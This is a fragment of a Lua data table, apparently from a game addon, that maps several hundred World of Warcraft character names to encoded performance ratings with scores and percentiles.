["Loam"] = "LT:820/96%LB:760/97%LM:965/98%",
["Triplem"] = "CT:53/13%LB:730/95%EM:879/92%",
["Maugg"] = "ST:801/99%SB:723/99%SM:922/99%",
["Mademea"] = "ET:795/94%LB:731/95%LM:805/97%",
["Ateliere"] = "ET:375/89%LB:705/95%EM:877/93%",
["Cexxie"] = "ET:800/94%SB:724/99%EM:850/91%",
["Moistgrapes"] = "ET:778/94%LB:767/98%LM:925/97%",
["Thiccjoo"] = "ET:765/92%LB:766/98%SM:986/99%",
["Megatower"] = "ET:420/91%LB:767/98%SM:1000/99%",
["Onejuanwon"] = "ET:635/81%LB:672/98%LM:950/97%",
["Tombradyy"] = "LT:859/98%SB:783/99%LM:934/96%",
["Creamdreamz"] = "UT:383/47%EB:570/94%EM:694/93%",
["Bubukittyf"] = "ET:748/90%SB:732/99%LM:908/96%",
["Ruxxin"] = "LT:567/97%LB:659/98%EM:804/86%",
["Titanaw"] = "ET:783/94%LB:664/98%LM:953/97%",
["Kødak"] = "ET:328/84%LB:589/96%LM:905/97%",
["Dweef"] = "ET:750/91%LB:713/96%EM:892/94%",
["Blaaze"] = "LT:846/97%LB:731/97%SM:988/99%",
["Delete"] = "ET:474/94%LB:768/98%SM:995/99%",
["Pøpe"] = "LB:760/98%LM:923/96%",
["Arcoshim"] = "LT:525/96%LB:734/97%EM:881/93%",
["Skysqs"] = "LT:837/97%LB:770/98%LM:920/95%",
["Woodchipper"] = "ET:759/92%EB:713/94%EM:748/81%",
["Sunnysun"] = "ST:890/99%SB:787/99%LM:943/98%",
["Enkïdu"] = "ET:803/94%LB:773/98%LM:958/97%",
["Gearthshock"] = "UT:359/46%LB:612/97%EM:475/82%",
["Rutomak"] = "LT:844/97%LB:764/98%LM:952/97%",
["Shamatank"] = "ET:778/93%LB:763/98%EM:882/94%",
["Undeadhead"] = "ET:665/83%SB:711/99%SM:891/99%",
["Adwarfpriest"] = "ET:618/81%EB:649/91%EM:753/82%",
["Janitorvenue"] = "LT:809/95%LB:752/97%EM:894/93%",
["Qinbao"] = "ET:325/84%EB:681/92%LM:905/95%",
["Piddy"] = "LB:727/96%EM:776/85%",
["Chowfaun"] = "ET:648/81%LB:659/98%EM:822/91%",
["Iamcandy"] = "ET:786/93%LB:772/98%LM:955/97%",
["Isidora"] = "ET:598/78%EB:537/78%EM:832/90%",
["Tinamarie"] = "LT:798/95%LB:765/98%LM:811/97%",
["Biebiwo"] = "RT:524/65%LB:768/98%SM:991/99%",
["Whosshamy"] = "EB:614/86%UM:366/40%",
["Djß"] = "LB:723/95%LM:953/97%",
["Zerra"] = "ET:701/87%LB:744/97%LM:726/95%",
["Goring"] = "ET:761/92%LB:730/96%EM:615/90%",
["Aviee"] = "LT:706/98%LB:784/98%EM:914/94%",
["Yeslightning"] = "LT:876/98%LB:774/98%EM:845/91%",
["Pancakebread"] = "ET:462/94%LB:746/97%LM:957/98%",
["Thepopé"] = "LT:810/96%LB:714/95%LM:932/97%",
["Romn"] = "ET:654/84%LB:767/98%SM:995/99%",
["Slìfer"] = "ET:753/90%LB:741/96%EM:913/94%",
["Focksi"] = "RT:396/52%EB:673/91%EM:713/81%",
["Grandheart"] = "ET:746/91%LB:582/96%EM:841/90%",
["Jlai"] = "LT:842/97%SB:730/99%SM:987/99%",
["Romang"] = "RT:503/67%LB:696/95%EM:866/92%",
["Ashley"] = "ET:296/79%LB:716/96%LM:928/96%",
["Hardgrape"] = "UT:391/49%EB:656/91%RM:467/55%",
["Timewasted"] = "ET:622/79%EB:715/94%LM:900/95%",
["Homeostasis"] = "ET:703/87%EB:629/88%LM:911/95%",
["Tinybao"] = "LT:832/97%EB:695/94%LM:906/95%",
["Mishy"] = "ET:788/94%SB:788/99%LM:959/98%",
["Sinman"] = "LT:805/95%LB:750/97%LM:920/95%",
["Crakka"] = "LT:644/98%LB:749/97%SM:1012/99%",
["Yourgodcow"] = "LT:566/96%LB:649/97%EM:727/81%",
["Igore"] = "ST:828/99%SB:778/99%LM:965/97%",
["Retartwo"] = "LT:581/98%EB:663/85%",
["Everflow"] = "ST:800/99%SB:888/99%SM:1149/99%",
["Tiltproof"] = "LT:750/95%EB:671/86%EM:768/83%",
["Otos"] = "LT:560/98%EB:737/93%RM:663/71%",
["Nanigans"] = "ST:859/99%SB:876/99%SM:1003/99%",
["Deaptwo"] = "ST:793/99%EB:699/89%LM:883/98%",
["Surj"] = "LT:787/98%SB:803/99%EM:538/92%",
["Darnassus"] = "ST:814/99%SB:825/99%LM:982/98%",
["Sammiie"] = "ST:846/99%SB:820/99%LM:957/98%",
["Blackpenguin"] = "LT:744/95%LB:763/96%EM:745/79%",
["Ihatemelee"] = "LT:776/98%SB:809/99%LM:990/98%",
["Impactt"] = "ET:741/94%LB:754/95%EM:886/91%",
["Taj"] = "LT:786/98%SB:756/99%LM:986/98%",
["Yeahimbadlol"] = "ET:738/94%LB:763/96%LM:962/98%",
["Jambajukes"] = "ST:822/99%SB:811/99%SM:997/99%",
["Cashundo"] = "ST:827/99%LB:773/97%LM:931/95%",
["Hydrokronik"] = "ST:802/99%SB:851/99%SM:1047/99%",
["Vyonka"] = "LT:782/98%LB:753/95%RM:646/70%",
["Viin"] = "LT:753/96%LB:778/97%EM:916/94%",
["Valmor"] = "LT:777/97%LB:785/98%LM:958/97%",
["Fenn"] = "ST:817/99%SB:831/99%SM:1036/99%",
["Rectifyd"] = "LT:781/98%SB:794/99%LM:983/98%",
["Kanekikun"] = "LT:768/97%LB:776/97%LM:958/97%",
["Ellastic"] = "ST:810/99%LB:745/97%EM:878/91%",
["Aì"] = "LT:777/98%LB:767/96%LM:929/95%",
["Shackwell"] = "LT:786/98%LB:716/95%UM:395/46%",
["Frieza"] = "ST:818/99%SB:796/99%LM:981/98%",
["Backyardbeer"] = "ST:807/99%SB:838/99%LM:962/97%",
["Juantime"] = "LT:771/97%LB:780/98%EM:810/86%",
["Billmurray"] = "ST:737/99%LB:741/98%LM:931/95%",
["Beatsorming"] = "LT:792/98%SB:804/99%LM:921/95%",
["Mingshi"] = "LT:505/97%LB:746/95%LM:932/96%",
["Adorack"] = "LT:761/96%SB:767/99%LM:949/96%",
["Syrupy"] = "ST:798/99%LB:761/95%LM:957/96%",
["Diamante"] = "LT:794/98%SB:812/99%LM:986/98%",
["Lobstergou"] = "ST:835/99%SB:822/99%LM:973/98%",
["Hungyu"] = "LT:747/95%LB:776/97%EM:786/84%",
["Drinknblink"] = "LT:771/98%SB:765/99%SM:1044/99%",
["Flymeout"] = "LT:640/98%LB:790/98%LM:820/98%",
["Edwins"] = "ET:742/94%LB:732/98%EM:715/93%",
["Loldead"] = "LT:790/98%LB:783/98%LM:970/97%",
["Deoi"] = "LT:770/97%EB:731/92%LM:940/96%",
["Raichau"] = "LT:780/98%LB:759/95%LM:955/97%",
["Reevager"] = "LT:743/95%LB:756/95%LM:990/98%",
["Jrd"] = "ST:817/99%SB:785/99%SM:1011/99%",
["Smokeyshrek"] = "ST:681/99%SB:758/99%LM:931/95%",
["Un"] = "ST:792/99%LB:758/98%EM:639/92%",
["Stevenyy"] = "ST:791/99%LB:729/98%LM:951/96%",
["Tethy"] = "ST:850/99%LB:779/98%SM:994/99%",
["Blacksixsix"] = "ST:796/99%SB:787/99%LM:977/98%",
["Stratosphere"] = "ST:839/99%SB:840/99%SM:1000/99%",
["Fuzy"] = "ST:820/99%LB:782/98%LM:933/95%",
["Slever"] = "ST:813/99%SB:847/99%SM:1008/99%",
["Bîsu"] = "ET:720/93%LB:757/95%LM:963/97%",
["Neroko"] = "LT:791/98%SB:775/99%LM:971/97%",
["Kmol"] = "ST:667/99%LB:755/95%EM:906/93%",
["Polz"] = "LT:767/97%LB:777/97%LM:930/95%",
["Konichiwa"] = "ST:802/99%SB:803/99%LM:982/98%",
["Lidders"] = "LT:787/98%LB:766/96%EM:898/93%",
["Pikachau"] = "LT:782/98%SB:809/99%SM:999/99%",
["Guinsoo"] = "ST:808/99%SB:745/99%SM:1011/99%",
["Natali"] = "LT:761/96%LB:779/97%LM:966/97%",
["Sayeh"] = "LT:791/98%LB:788/98%LM:976/98%",
["Rudahs"] = "ST:850/99%SB:758/99%SM:962/99%",
["Missfury"] = "ET:742/94%LB:770/97%EM:850/90%",
["Drazhar"] = "LT:791/98%SB:756/99%SM:1004/99%",
["Raisehell"] = "LT:747/95%LB:780/97%SM:1021/99%",
["Devouring"] = "LT:767/97%EB:711/94%EM:699/94%",
["Peachdown"] = "LT:781/98%SB:821/99%SM:1043/99%",
["Twigi"] = "LT:798/95%EB:684/93%LM:934/97%",
["Reverendjim"] = "LT:799/95%LB:758/98%LM:810/97%",
["Bunzosteele"] = "ET:486/94%LB:740/97%LM:947/97%",
["Bicard"] = "ET:784/94%EB:647/90%EM:810/88%",
["Murrdoch"] = "ET:763/92%SB:791/99%LM:958/98%",
["Cygnasty"] = "LT:854/98%SB:820/99%SM:980/99%",
["Khanrad"] = "ET:702/87%EB:674/93%LM:945/97%",
["Friskyhealz"] = "ET:792/94%LB:721/96%LM:903/95%",
["Etamsylate"] = "ST:815/99%SB:774/99%LM:967/98%",
["Jimbodin"] = "ST:730/99%SB:704/99%LM:971/98%",
["Bonegrowth"] = "ET:769/92%EB:557/94%EM:863/91%",
["Blueblue"] = "ET:727/89%EB:695/94%EM:833/92%",
["Lúcent"] = "LT:814/96%LB:748/98%EM:826/91%",
["Zolyharry"] = "LT:828/96%EB:691/93%SM:971/99%",
["Preordain"] = "ET:769/92%LB:723/96%LM:953/98%",
["Pegistin"] = "LT:863/98%EB:677/92%EM:883/94%",
["Kaytie"] = "LT:839/97%LB:754/97%EM:872/93%",
["Velkatt"] = "ET:783/94%LB:746/98%EM:849/93%",
["Buzhir"] = "ET:745/91%LB:742/97%LM:943/97%",
["Santyclause"] = "LT:802/95%LB:736/97%SM:881/99%",
["Kvpriest"] = "ET:719/88%EB:683/93%EM:829/89%",
["Iseedeads"] = "LT:798/95%LB:747/98%LM:956/98%",
["Kimps"] = "LT:611/98%LB:598/96%LM:939/98%",
["Iterations"] = "ET:781/93%LB:609/97%EM:799/87%",
["Zncdhg"] = "LT:859/98%EB:573/79%EM:444/79%",
["Tch"] = "ET:761/92%EB:542/93%EM:817/91%",
["Snazz"] = "ET:758/92%LB:768/98%LM:936/96%",
["Freshjams"] = "LT:860/98%LB:709/95%EM:806/90%",
["Telreyne"] = "ET:743/91%EB:675/92%LM:940/97%",
["Slutfingerz"] = "ET:766/92%EB:670/91%LM:912/96%",
["Mercyhold"] = "LT:866/98%EB:520/91%EM:699/79%",
["Outprayed"] = "ST:714/99%LB:642/98%LM:715/95%",
["Snoweze"] = "ET:686/86%LB:712/95%EM:822/88%",
["Badminton"] = "LT:800/95%LB:681/98%LM:948/97%",
["Zuhayr"] = "ET:789/94%LB:737/97%LM:951/97%",
["Mintychan"] = "LT:834/97%LB:730/97%LM:881/95%",
["Tristian"] = "ST:899/99%SB:897/99%SM:1048/99%",
["Bichinheals"] = "ET:785/94%SB:679/99%LM:949/98%",
["Sonicbewm"] = "LT:817/96%LB:720/95%EM:848/89%",
["Muffinman"] = "ET:697/86%EB:673/92%EM:797/86%",
["Dàc"] = "LT:827/97%LB:758/98%SM:980/99%",
["Baeldru"] = "LT:835/96%LB:764/98%LM:967/98%",
["Oliveraj"] = "ET:658/82%EB:668/92%EM:825/89%",
["Hotdoghumper"] = "ET:386/88%EB:689/93%LM:901/95%",
["Constantinee"] = "ET:436/93%SB:787/99%EM:864/91%",
["Sugarmummy"] = "LT:812/95%LB:701/95%EM:656/81%",
["Thehealz"] = "ET:445/92%EB:605/85%LM:886/95%",
["Logsdale"] = "LT:837/97%LB:764/98%SM:1024/99%",
["Novanlor"] = "LT:819/96%EB:686/93%RM:602/69%",
["Steve"] = "LT:520/96%EB:656/90%EM:858/92%",
["Thrane"] = "LT:823/96%EB:704/94%EM:881/94%",
["Mcstanky"] = "ST:882/99%LB:770/98%LM:945/97%",
["Artie"] = "ET:759/92%LB:721/96%LM:912/95%",
["Elphirt"] = "ET:700/86%LB:726/96%LM:966/98%",
["Phidose"] = "ET:676/85%LB:752/97%LM:954/98%",
["Pegas"] = "LT:870/98%LB:765/98%LM:919/95%",
["Urmyson"] = "ET:295/78%LB:584/96%EM:892/94%",
["Anniethebest"] = "LT:802/95%LB:718/96%LM:939/97%",
["Tinytiny"] = "LT:849/98%SB:776/99%LM:954/98%",
["Pinkhaze"] = "ST:892/99%SB:782/99%LM:940/97%",
["Yovinny"] = "LT:803/95%LB:743/97%LM:887/95%",
["Snippybeaver"] = "LT:801/95%SB:712/99%LM:959/98%",
["Applepen"] = "LT:726/97%LB:703/95%EM:872/92%",
["Rorn"] = "ET:742/90%LB:730/96%LM:921/96%",
["Shinzalah"] = "ET:750/91%EB:675/93%EM:796/86%",
["Maoladin"] = "LT:622/98%LB:735/97%EM:784/85%",
["Galavant"] = "LT:820/96%SB:765/99%LM:949/97%",
["Págáni"] = "ET:725/89%EB:665/92%LM:881/95%",
["Arthricia"] = "ET:708/87%EB:668/91%LM:900/95%",
["Arishnakrov"] = "LT:700/95%LB:775/98%LM:923/96%",
["Kitha"] = "ET:786/94%LB:608/96%LM:909/95%",
["Anduinswar"] = "ET:724/93%SB:757/99%EM:800/85%",
["Trollrage"] = "ET:695/90%EB:742/94%RM:638/68%",
["Tonkuh"] = "ET:654/85%LB:769/97%EM:706/93%",
["Kornbread"] = "LT:732/95%LB:762/95%LM:895/96%",
["Brucebaner"] = "LT:759/96%LB:772/97%EM:914/93%",
["Drvgs"] = "ET:706/91%LB:680/96%EM:839/89%",
["Pawks"] = "LT:777/97%LB:781/98%LM:957/96%",
["Efrafa"] = "ET:669/86%LB:774/97%LM:970/97%",
["Frostyfx"] = "LT:765/96%LB:746/98%LM:936/95%",
["Reggienoble"] = "ET:615/81%LB:755/95%EM:473/80%",
["Oní"] = "LT:745/95%LB:797/98%LM:959/97%",
["Dyneth"] = "ST:831/99%SB:903/99%SM:1061/99%",
["Mackx"] = "SB:808/99%SM:1048/99%",
["Whistleblowr"] = "ET:729/93%LB:781/98%EM:863/88%",
["Afivekobe"] = "LT:770/97%LB:773/97%LM:955/97%",
["Reynall"] = "LT:463/96%LB:759/96%SM:995/99%",
["Henckels"] = "LT:767/97%SB:758/99%SM:1001/99%",
["Jfac"] = "ET:646/84%LB:769/97%LM:978/97%",
["Caseyfish"] = "LT:787/98%LB:786/98%SM:951/99%",
["Kaigu"] = "SB:840/99%SM:1093/99%",
["Prada"] = "LT:793/98%SB:804/99%LM:996/98%",
["Jynxx"] = "ST:746/99%LB:789/98%LM:972/98%",
["Gromgor"] = "LT:742/95%EB:747/94%LM:957/96%",
["Jakemalphur"] = "LT:754/96%LB:756/95%SM:1013/99%",
["Cokey"] = "LT:771/97%LB:789/98%LM:989/98%",
["Xéqtr"] = "ET:415/94%LB:771/96%LM:975/98%",
["Vantalotus"] = "LT:773/97%LB:765/96%LM:946/96%",
["Spookiest"] = "SB:800/99%SM:1019/99%",
["Headbonker"] = "ET:664/86%LB:743/98%EM:910/93%",
["Drakahl"] = "LT:783/98%SB:883/99%SM:1064/99%",
["Rasori"] = "ET:721/93%SB:803/99%LM:982/98%",
["Psycomidget"] = "ST:921/99%SB:854/99%SM:1192/99%",
["Draugar"] = "ST:755/99%SB:803/99%EM:881/87%",
["Milfncookiez"] = "LT:748/95%LB:759/95%EM:921/92%",
["Nécrox"] = "ST:729/99%SB:795/99%SM:994/99%",
["Koneko"] = "LT:769/97%SB:801/99%LM:971/98%",
["Xibar"] = "LT:746/95%SB:793/99%LM:964/98%",
["Matatamoo"] = "ET:693/90%LB:771/96%EM:615/79%",
["Onegative"] = "ET:678/87%LB:774/97%LM:955/97%",
["Ruf"] = "LT:638/98%LB:786/98%LM:934/95%",
["Tsär"] = "LT:753/95%LB:763/96%LM:958/97%",
["Booman"] = "LT:790/98%SB:813/99%SM:986/99%",
["Sno"] = "ET:571/76%LB:719/98%EM:859/90%",
["Ggkgb"] = "LT:746/95%LB:741/98%EM:787/84%",
["Zlayn"] = "LT:755/96%LB:769/96%EM:875/90%",
["Mosentok"] = "LT:793/98%LB:778/97%LM:990/98%",
["Kta"] = "LT:789/98%LB:788/98%EM:908/92%",
["Slynkz"] = "ST:810/99%SB:832/99%SM:1066/99%",
["Creeture"] = "LT:770/97%LB:788/98%LM:809/95%",
["Netsec"] = "ET:711/91%LB:754/95%LM:952/97%",
["Tetsubo"] = "UT:106/39%LB:762/96%EM:857/88%",
["Zuglord"] = "ET:638/84%SB:760/99%EM:632/89%",
["Supersquirt"] = "ST:875/99%SB:903/99%SM:1006/99%",
["Buryd"] = "LT:747/95%LB:735/98%EM:921/94%",
["Litgo"] = "UT:130/46%LB:779/98%EM:894/91%",
["Sliverfox"] = "LT:744/95%LB:783/98%EM:859/89%",
["Aireez"] = "ST:798/99%LB:785/98%EM:877/90%",
["Thekingslayr"] = "ST:804/99%SB:861/99%SM:993/99%",
["Mksampson"] = "ET:687/89%EB:749/94%EM:878/90%",
["Wrest"] = "LT:780/98%LB:764/96%LM:936/96%",
["Zenzou"] = "LT:782/98%SB:757/99%LM:921/95%",
["Grace"] = "ST:799/99%LB:780/98%SM:1031/99%",
["Secretz"] = "ET:708/90%SB:802/99%EM:911/93%",
["Lilnarn"] = "ET:678/88%SB:753/99%EM:867/89%",
["Rosaire"] = "ET:730/93%LB:785/98%LM:957/97%",
["Empale"] = "RT:516/70%EB:741/93%EM:772/83%",
["Badass"] = "ET:691/89%LB:757/95%EM:919/94%",
["Fos"] = "ST:844/99%SB:846/99%SM:1019/99%",
["Verac"] = "ET:683/89%LB:692/97%LM:955/97%",
["Skoof"] = "ET:709/91%LB:720/98%LM:964/97%",
["Oliviann"] = "ET:725/89%LB:734/97%EM:884/94%",
["Stomptheyard"] = "LT:848/97%LB:719/95%EM:779/86%",
["Healbro"] = "ET:477/94%LB:742/97%LM:927/96%",
["Ironbuffalo"] = "LT:872/98%LB:745/96%LM:918/96%",
["Svenhilde"] = "UT:272/33%EB:666/92%EM:835/90%",
["Continuity"] = "LT:804/95%EB:694/93%LM:958/98%",
["Gdkpslave"] = "ET:662/83%EB:661/91%EM:786/88%",
["Høld"] = "LT:543/96%EB:651/89%LM:920/96%",
["Neddy"] = "LT:796/95%SB:794/99%SM:1026/99%",
["Andronikos"] = "ET:780/93%EB:710/94%LM:962/98%",
["Royallily"] = "LT:817/95%LB:711/95%EM:668/93%",
["Ungas"] = "LT:518/95%EB:689/94%EM:803/87%",
["Lockjaaw"] = "ET:289/77%EB:505/91%EM:859/92%",
["Danejah"] = "ET:433/92%LB:722/96%LM:902/95%",
["Antithetical"] = "ET:736/90%SB:785/99%LM:973/98%",
["Nieriesta"] = "ET:664/83%LB:706/95%EM:690/94%",
["Maevan"] = "ET:766/92%LB:743/97%EM:658/92%",
["Healinglol"] = "ET:788/93%LB:768/98%LM:966/98%",
["Momosham"] = "LT:830/96%LB:774/98%LM:923/95%",
["Fibtwo"] = "RT:566/72%LB:711/95%EM:870/93%",
["Zulio"] = "RT:582/74%LB:765/98%EM:893/94%",
["Astarielle"] = "ST:775/99%SB:727/99%SM:976/99%",
["Drtyd"] = "LT:551/96%LB:768/98%LM:919/95%",
["Coker"] = "RT:556/71%LB:572/95%EM:862/92%",
["Pokers"] = "LT:606/97%LB:740/96%LM:941/96%",
["Renate"] = "ET:610/78%SB:796/99%SM:1021/99%",
["Roarkelly"] = "ST:721/99%LB:650/98%LM:928/95%",
["Rakuu"] = "ET:804/94%SB:720/99%EM:889/94%",
["Carmie"] = "ET:483/94%LB:730/96%LM:922/96%",
["Ozmosh"] = "ET:785/93%LB:754/97%LM:799/97%",
["Pdog"] = "LB:749/98%LM:911/95%",
["Selajin"] = "ET:641/81%EB:643/90%EM:819/91%",
["Pomeloaugust"] = "LT:823/96%LB:620/96%LM:878/98%",
["Totosaint"] = "ET:427/91%LB:750/98%LM:744/96%",
["Rawrmatt"] = "ET:596/75%EB:674/90%EM:867/93%",
["Rawrkitty"] = "LT:590/97%LB:755/97%SM:893/99%",
["Stationary"] = "LT:675/98%LB:600/96%LM:913/95%",
["Great"] = "ET:753/90%LB:730/95%LM:931/97%",
["Burbo"] = "LT:842/97%LB:751/97%LM:955/98%",
["Dankston"] = "LT:570/97%EB:681/93%EM:894/94%",
["Gertrack"] = "ET:713/88%LB:726/96%LM:948/97%",
["Roøng"] = "LT:875/98%SB:796/99%SM:984/99%",
["Daeo"] = "ET:734/90%LB:722/96%LM:968/98%",
["Thomar"] = "ET:646/81%LB:651/98%EM:812/90%",
["Moribund"] = "ET:775/92%LB:759/97%EM:862/90%",
["Interpunct"] = "ET:792/94%LB:757/97%LM:954/97%",
["Trollfire"] = "ET:426/91%LB:741/96%LM:951/97%",
["Doxadin"] = "LT:824/96%LB:744/97%EM:886/93%",
["Cairdin"] = "ET:773/93%EB:692/94%EM:827/89%",
["Chagi"] = "ET:796/94%SB:809/99%LM:977/98%",
["Residue"] = "ET:747/91%LB:728/96%LM:958/98%",
["Demise"] = "LT:647/98%LB:739/96%LM:938/97%",
["Xzia"] = "ET:753/91%LB:565/95%LM:913/96%",
["Eshmun"] = "LT:803/95%LB:752/97%LM:930/96%",
["Martöck"] = "ET:720/89%LB:598/96%LM:922/95%",
["Lycheejelly"] = "ET:743/90%EB:670/92%",
["Pesh"] = "LT:506/96%EB:694/92%EM:904/94%",
["Lomang"] = "RT:563/72%LB:707/95%LM:933/96%",
["Oldwangmei"] = "ET:693/87%LB:730/96%LM:929/96%",
["Banananinja"] = "ET:795/94%LB:779/98%LM:924/96%",
["Brusnik"] = "ET:667/87%LB:656/98%LM:910/95%",
["Galadis"] = "ST:706/99%LB:741/97%EM:515/86%",
["Refuge"] = "LT:788/98%LB:784/98%LM:939/95%",
["Chicknuggy"] = "LT:763/97%EB:733/93%EM:908/93%",
["Merax"] = "LT:777/98%SB:826/99%SM:1016/99%",
["Philosophys"] = "ST:803/99%SB:803/99%LM:979/98%",
["Organic"] = "LT:772/97%EB:730/92%LM:934/95%",
["Schnitter"] = "LT:791/98%SB:786/99%SM:912/99%",
["Maplem"] = "ST:805/99%SB:801/99%LM:983/98%",
["Frites"] = "LT:767/97%LB:757/95%EM:908/93%",
["Faele"] = "ET:727/93%LB:752/96%SM:968/99%",
["Chart"] = "LT:773/97%SB:803/99%LM:956/96%",
["Golfclap"] = "ST:807/99%SB:840/99%SM:1012/99%",
["Kanorro"] = "LT:778/97%LB:764/96%EM:903/92%",
["Joomangee"] = "ET:661/86%LB:729/98%EM:849/89%",
["Jizer"] = "LT:759/96%SB:805/99%SM:1004/99%",
["Killstepp"] = "LT:494/96%EB:697/88%EM:746/81%",
["Roony"] = "LT:785/98%SB:789/99%LM:958/97%",
["Yard"] = "ST:800/99%SB:815/99%SM:1070/99%",
["Escapist"] = "LT:785/98%LB:776/97%LM:962/97%",
["Bugtiann"] = "ST:814/99%EB:619/94%LM:922/95%",
["Tonkas"] = "ST:892/99%SB:837/99%SM:922/99%",
["Bloott"] = "LT:785/98%SB:830/99%LM:939/97%",
["Mlg"] = "LT:787/98%LB:776/97%SM:1111/99%",
["Abra"] = "LT:785/98%SB:786/99%SM:991/99%",
["Lavitzx"] = "LT:783/98%LB:768/96%LM:928/96%",
["Tigolbity"] = "ET:728/94%SB:781/99%EM:877/92%",
["Blackröse"] = "LT:749/96%LB:675/97%EM:805/84%",
["Staerk"] = "ST:814/99%SB:867/99%SM:1111/99%",
["Aminf"] = "LT:753/95%LB:661/96%EM:895/91%",
["Arkavin"] = "LT:787/98%SB:819/99%SM:1021/99%",
["Fv"] = "LT:771/97%SB:745/99%SM:998/99%",
["Stilted"] = "LT:787/98%SB:822/99%SM:1010/99%",
["Soar"] = "LT:770/97%EB:697/93%EM:689/79%",
["Amphy"] = "ST:795/99%LB:794/98%SM:1001/99%",
["Ryanzorz"] = "ST:820/99%SB:789/99%SM:1091/99%",
["Keaponlaffin"] = "LT:778/98%LB:772/97%LM:947/96%",
["Juicebag"] = "LT:781/98%SB:750/99%EM:914/93%",
["Aggroplz"] = "LT:745/95%LB:772/97%LM:972/98%",
["Zlayer"] = "LT:790/98%LB:795/98%LM:994/98%",
["Kraken"] = "ST:797/99%SB:765/99%LM:976/98%",
["Nautik"] = "LT:778/98%SB:828/99%SM:1076/99%",
["Odyn"] = "LT:758/96%LB:755/95%EM:822/91%",
["Topsznx"] = "LT:768/97%LB:773/97%LM:944/95%",
["Bext"] = "LT:749/95%LB:637/95%EM:921/94%",
["Fourwatt"] = "ST:822/99%SB:804/99%LM:976/98%",
["Saucerboy"] = "ST:841/99%LB:794/98%SM:1008/99%",
["Vardrice"] = "LT:783/98%LB:772/97%LM:965/97%",
["Execuitee"] = "ST:800/99%SB:799/99%LM:809/96%",
["Refleximus"] = "LT:759/96%LB:781/98%EM:930/94%",
["Deerizzy"] = "LT:745/95%LB:741/98%EM:722/93%",
["Occy"] = "ST:739/99%SB:757/99%LM:941/96%",
["Frothy"] = "ST:802/99%SB:821/99%SM:1061/99%",
["Aryn"] = "ST:683/99%SB:823/99%LM:959/97%",
["Syss"] = "LT:754/96%LB:757/95%SM:1018/99%",
["Boba"] = "LT:767/97%SB:791/99%LM:941/95%",
["Chippette"] = "LT:787/98%LB:658/97%LM:920/97%",
["Rigomorcrits"] = "LT:787/98%LB:761/96%EM:933/94%",
["Vulcanis"] = "LT:749/95%LB:795/98%SM:1040/99%",
["Regresser"] = "LT:788/98%SB:829/99%LM:955/97%",
["Kimmyhead"] = "ST:862/99%SB:829/99%SM:979/99%",
["Woyyer"] = "LT:779/98%SB:768/99%LM:843/97%",
["Gankzy"] = "LT:766/97%LB:798/98%SM:1001/99%",
["Blessya"] = "ST:819/99%SB:882/99%SM:1113/99%",
["Collins"] = "ST:710/99%LB:766/96%EM:919/94%",
["Primetuna"] = "ET:732/93%SB:757/99%LM:962/97%",
["Galm"] = "LT:782/98%SB:815/99%SM:1019/99%",
["Urmum"] = "LT:786/98%LB:767/96%LM:948/95%",
["Tricksy"] = "LT:769/97%LB:784/98%LM:973/98%",
["Urien"] = "LT:761/96%LB:780/97%LM:992/98%",
["Kalidan"] = "LT:778/98%SB:774/99%LM:957/97%",
["Konz"] = "ST:792/99%SB:833/99%SM:1007/99%",
["Kiraiceblade"] = "LT:791/98%SB:839/99%LM:991/98%",
["Elmn"] = "ST:816/99%SB:786/99%LM:839/96%",
["Slamz"] = "ST:797/99%SB:813/99%LM:993/98%",
["Drak"] = "ST:818/99%SB:826/99%SM:1003/99%",
["Chastitty"] = "LT:752/95%LB:778/97%LM:954/97%",
["Fourtytwo"] = "ST:741/99%LB:792/98%LM:986/98%",
["Zaiden"] = "ST:814/99%SB:817/99%LM:949/97%",
["Hammerpänts"] = "LT:631/98%SB:775/99%LM:846/98%",
["Howrain"] = "ET:705/87%EB:598/83%EM:895/93%",
["Darksoulol"] = "ET:788/93%LB:742/96%EM:685/93%",
["Rizzo"] = "ET:749/91%LB:744/96%LM:966/98%",
["Namufot"] = "LT:837/97%LB:729/96%EM:851/92%",
["Gupzilla"] = "ET:748/91%LB:659/98%LM:908/95%",
["Notahealer"] = "ET:717/89%LB:726/96%LM:912/95%",
["Violane"] = "ET:638/82%LB:753/97%LM:956/97%",
["Hugbiggerleg"] = "LT:823/96%LB:745/97%LM:912/95%",
["Sopping"] = "ET:770/93%LB:678/98%SM:913/99%",
["Moorbik"] = "LT:834/97%LB:657/98%LM:794/97%",
["Healslave"] = "ET:690/85%EB:671/92%RM:622/69%",
["Bunkmoreland"] = "LT:806/95%EB:544/94%LM:934/97%",
["Nattys"] = "LT:824/96%EB:486/90%EM:768/84%",
["Chysamere"] = "ST:811/99%LB:676/98%EM:877/94%",
["Cyclone"] = "LT:831/96%LB:669/98%SM:991/99%",
["Holy"] = "LT:818/96%LB:672/98%SM:991/99%",
["Wishess"] = "LT:856/98%SB:782/99%LM:978/98%",
["Allamerican"] = "ET:768/93%EB:659/89%SM:987/99%",
["Rainie"] = "ET:704/87%RB:469/68%EM:758/84%",
["Jeanpaul"] = "ET:791/94%LB:723/95%EM:871/92%",
["Meldariòn"] = "LT:851/98%SB:732/99%EM:868/92%",
["Codemane"] = "ET:581/75%RB:464/67%EM:754/82%",
["Deluyi"] = "LT:834/96%SB:785/99%SM:992/99%",
["Paetra"] = "LT:791/95%LB:706/95%EM:769/86%",
["Fundamentals"] = "ET:757/92%EB:523/75%RM:306/65%",
["Azuremu"] = "ET:408/90%EB:550/94%RM:267/59%",
["Fashionnovia"] = "LT:538/96%EB:686/93%EM:853/93%",
["Coves"] = "ET:760/92%EB:526/93%EM:691/94%",
["Krulrin"] = "ET:738/90%LB:720/96%EM:880/93%",
["Estreya"] = "ET:698/87%LB:763/98%LM:966/98%",
["Cupzs"] = "ET:778/93%LB:752/98%RM:656/72%",
["Evilharley"] = "ET:669/84%LB:704/95%EM:850/93%",
["Wearyeyes"] = "ET:717/88%EB:660/90%EM:811/90%",
["Whiterose"] = "ET:748/91%EB:674/92%LM:902/95%",
["Harken"] = "LT:795/95%SB:711/99%LM:908/95%",
["Kamael"] = "LT:820/96%LB:609/97%LM:726/95%",
["Rachetella"] = "ET:670/83%EB:631/88%EM:737/81%",
["Vulc"] = "ET:610/77%RB:491/71%RM:664/73%",
["Meeraa"] = "ET:765/93%LB:740/97%LM:959/98%",
["Serqlo"] = "ET:728/90%LB:643/98%LM:956/98%",
["Neildiamond"] = "LT:842/97%SB:748/99%LM:780/96%",
["Whosyourmama"] = "ET:725/90%RB:519/72%EM:855/91%",
["Killpriest"] = "ET:778/93%LB:711/95%SM:975/99%",
["Freestate"] = "LT:862/98%LB:780/98%LM:975/98%",
